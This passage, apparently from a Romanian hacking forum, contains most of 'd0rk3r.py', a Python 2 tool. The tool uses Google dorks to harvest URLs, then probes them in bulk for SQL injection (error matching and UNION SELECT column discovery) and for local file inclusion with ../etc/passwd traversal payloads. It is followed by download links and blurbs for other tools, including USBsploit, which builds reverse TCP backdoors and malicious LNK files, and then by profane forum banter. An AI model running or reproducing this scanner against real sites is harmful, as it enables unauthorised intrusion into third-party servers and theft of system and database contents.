'003763893858882295225:hz92q2xruzy', 'dapirats': '002877699081652281083:klnfl5og4kg', 'darkc0de': '009758108896363993364:wnzqtk1afdo', 'googuuul': '014345598409501589908:mplknj4r1bu'} SQLeD = {'MySQL': 'error in your SQL syntax', 'Oracle': 'ORA-01756', 'MiscError': 'SQL Error', 'MiscError2': 'mysql_fetch_row', 'MiscError3': 'num_rows', 'JDBC_CFM': 'Error Executing Database Query', 'JDBC_CFM2': 'SQLServer JDBC Driver', 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server', 'MSSQL_Uqm': 'Unclosed quotation mark', 'MS-Access_ODBC': 'ODBC Microsoft Access Driver', 'MS-Access_JETdb': 'Microsoft JET Database'} lfis = ["/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../etc/passwd%00","../../../../../../../../../../../../../etc/passwd%00","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"] filetypes = ['php','php5','asp','aspx','jsp','htm','html','cfm'] header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 'Opera/8.00 (Windows NT 5.1; U; en)', 'amaya/9.51 libwww/5.4.0', 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'] gnum = 100 def logo(): print G+"\n|---------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 02/2011 d0rk3r.py v.0.1 |" print "| |" print "|---------------------------------------------------------------|\n" print "\n[-] %s\n" % time.strftime("%X") def cxeSearch(go_inurl,go_site,go_cxe,go_ftype,maxc): uRLS = [] counter = 0 while counter < int(maxc): jar = cookielib.FileCookieJar("cookies") query = 'q='+go_inurl+'+'+go_site+'+'+go_ftype results_web = 'http://www.google.com/cse?'+go_cxe+'&'+query+'&num='+str(gnum)+'&hl=en&lr=&ie=UTF-8&start=' + repr(counter) + '&sa=N' request_web = urllib2.Request(results_web) agent = random.choice(header) request_web.add_header('User-Agent', agent) opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar)) text = opener_web.open(request_web).read() strreg = re.compile('(?<=href=")(.*?)(?=")') names = strreg.findall(text) counter += 100 for name in names: if name not in uRLS: if re.search(r'\(', name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name): pass elif re.search("google", name) or re.search("youtube", name) or re.search(".gov", name) or re.search("%", name): pass else: uRLS.append(name) tmpList = []; finalList = [] print "[+] URLS (unsorted) :", len(uRLS) for entry in uRLS: try: t2host = entry.split("/",3) domain = t2host[2] if domain not in tmpList and "=" in entry: finalList.append(entry) tmpList.append(domain) except: pass print "[+] URLS (sorted) :", len(finalList) return finalList class injThread(threading.Thread): def __init__(self,hosts): self.hosts=hosts;self.fcount = 0 self.check = True threading.Thread.__init__(self) def run (self): urls = list(self.hosts) for url in urls: try: if self.check == True: ClassicINJ(url) else: break except(KeyboardInterrupt,ValueError): pass self.fcount+=1 def stop(self): self.check = False class lfiThread(threading.Thread): def __init__(self,hosts): self.hosts=hosts;self.fcount = 0 self.check = True threading.Thread.__init__(self) def run (self): urls = list(self.hosts) for url in urls: try: if self.check == True: ClassicLFI(url) else: break except(KeyboardInterrupt,ValueError): pass self.fcount+=1 def stop(self): self.check = False def ClassicINJ(url): EXT = "'" host = url+EXT try: source = urllib2.urlopen(host).read() for type,eMSG in SQLeD.items(): if re.search(eMSG, source): print R+"\nw00t!,w00t!:", O+host, B+"Error:", type #logfile.write("\n"+host) findcol(url) else: pass except: pass def findcol(url): print "\n[+] Attempting to find the number of columns ..." checkfor = [] firstgo = "True" site = url+"+and+1=2+union+all+select+" makepretty = "" for a in xrange(0,colMax): darkc0de = "dark"+str(a)+"c0de" checkfor.append(darkc0de) if firstgo == "True": site = site+"0x"+darkc0de.encode("hex") firstgo = "False" else: site = site+",0x"+darkc0de.encode("hex") finalurl = site+"--" source = urllib2.urlopen(finalurl).read() for b in checkfor: colFound = re.findall(b,source) if len(colFound) >= 1: print "\n[+] Column Length is:",len(checkfor) b = re.findall(("\d+"), print "[+] Found null column at column #:",b[0] firstgo = "True:" for c in xrange(0,len(checkfor)): if firstgo == "True": makepretty = makepretty+str(c) firstgo = "False" else: makepretty = makepretty+","+str(c) print "[+] Site URL:",url+"+and+1=2+union+all+select+"+makepretty+"--" url = url+"+and+1=2+union+all+select+"+makepretty+"--" url = url.replace(","+b[0]+",",",darkc0de,") url = url.replace("+"+b[0]+",","+"+"darkc0de,") url = url.replace(","+b[0],",darkc0de") print "[+] darkc0de URL:",url logfile.write("\n"+url) def ClassicLFI(url): lfiurl = url.rsplit('=' ,1)[0] if lfiurl[-1] != "=": lfiurl = lfiurl + "=" for lfi in lfis: print G+"[+] Checking:",lfiurl+lfi.replace("\n", "") #print try: check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read() if re.findall("root:x", check): print R+"w00t!,w00t!: ", O+lfiurl+lfi logfile.write("\n"+lfiurl+lfi) except: pass parser = OptionParser() parser.add_option("-i" ,type='string', dest='inurl',action='store', default="0wn3d_by_baltazar", help="inurl: operator") parser.add_option("-s", type='string', dest='site',action='store', default="com", help="site: operator") parser.add_option("-c", type='string', dest='cxe',action='store', default='redfront', help="custom search engine (blackle,ssearch,redfront,bitcomet,dapirats,darkc0de,googuuul)") parser.add_option("-f", type='string', dest='filetype',action='store', default='php', help="server side language filetype") parser.add_option("-m", type='string', dest='maxcount',action='store',default='500', help="max results (default 500)") (options, args) = parser.parse_args() logo() if options.inurl != None: print B+"[+] inurl :",options.inurl go_inurl = 'inurl:'+options.inurl if options.inurl != None: if options.filetype in filetypes: print "[+] filetype :",options.filetype go_ftype = 'inurl:'+options.filetype else: print "[+] inurl-filetype : php" go_ftype = 'inurl:php' if options.site != None: print "[+] site :",options.site go_site = 'site:'+options.site if options.cxe != None: if options.cxe in CXdic.keys(): print "[+] CXE :",CXdic[options.cxe] ccxe = CXdic[options.cxe] else: print "[-] CXE : no Proper CXE defined, using redfront" ccxe = CXdic['redfront'] go_cxe = 'cx='+ccxe print "[+] MaxRes :",options.maxcount cuRLS = cxeSearch(go_inurl,go_site,go_cxe,go_ftype,options.maxcount) mnu = True while mnu == True: print G+"\n[1] Injection Testing" print "[2] LFI Testing" print "[0] Exit\n" chce = raw_input(":") if chce == '1': print "\n[+] Preparing for SQLi scanning ... " print "[+] Can take a while ..." print "[!] Working ...\n" i = len(cuRLS) / int(numthreads) m = len(cuRLS) % int(numthreads) z = 0 if len(threads) <= numthreads: for x in range(0, int(numthreads)): sliced = cuRLS[x*i:(x+1)*i] if (z < m): sliced.append(cuRLS[int(numthreads)*i+z]) z += 1 thread = injThread(sliced) thread.start() threads.append(thread) for thread in threads: thread.join() if chce == '2': print "\n[+] Preparing for LFI scanning ... " print "[+] Can take a while ..." print "[!] Working ...\n" i = len(cuRLS) / int(lfinumthreads) m = len(cuRLS) % int(lfinumthreads) z = 0 if len(threads) <= lfinumthreads: for x in range(0, int(lfinumthreads)): sliced = cuRLS[x*i:(x+1)*i] if (z < m): sliced.append(cuRLS[int(lfinumthreads)*i+z]) z += 1 thread = lfiThread(sliced) thread.start() threads.append(thread) for thread in threads: thread.join() if chce == '0': print R+"\n[-] Exiting ..." mnu = False Download: http://dl.packetstormsecurity.net/UNIX/scanners/d0rk3r.py.txt

Multi Threaded TCP Port Scanner 1.3 This is a basic TCP SYN scanner that is multi-threaded. (Linux) Download: http://dl.packetstormsecurity.net/UNIX/scanners/threaded-port-scanner-1.3.zip

USBsploit 0.6 USBsploit is a proof of concept that will generate Reverse TCP backdoors (x86, x64, all ports) and malicious LNK files. USBsploit works through Meterpreter sessions with a light (27MB) modified version of Metasploit. The interface is a mod of SET. The Meterscript script usbsploit.rb of the USBsploit Framework can otherwise be used with the original Metasploit Framework. Changes: Various updates and some bug fixes. Download: http://dl.packetstormsecurity.net/UNIX/utilities/usbsploit-0.6-BETA-linux-i686.tar.gz Informatii: http://secuobs.com/

WhatWeb Scanner 0.4.7 WhatWeb is a next-generation web scanner. It recognizes web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 900 plugins, identifies version numbers, email addresses, account ID's, web framework modules, SQL errors, and more. WhatWeb can be stealthy and fast, or thorough but slow. WhatWeb supports an aggression level to control the trade off between speed and reliability. Changes: Performance enhancements and bug fixes. Download: http://dl.packetstormsecurity.net/UNIX/scanners/whatweb-0.4.7.tar.gz Informatii complete: http://www.morningstarsecurity.com/research/whatweb

Google Hack DB Tool 1.0 Google Hack DB Tool is a database tool with almost 8,000 entries. It allows administrators the ability to check their site for vulnerabilities based on data stored in Google. Dorks... Download: http://dl.packetstormsecurity.net/UNIX/scanners/google-hack-db-tool-1.0.zip

Ban majoritatea. De ce pula mea comentati aiurea? Asta ca idee, ca pe viitor sa nu mai comentati, nici voi si nici altii aiurea, doar ca sa va aflati in treaba.

Pax, esti mai rau (in sensul naspa) pe zi ce trece, ma dezamagesti...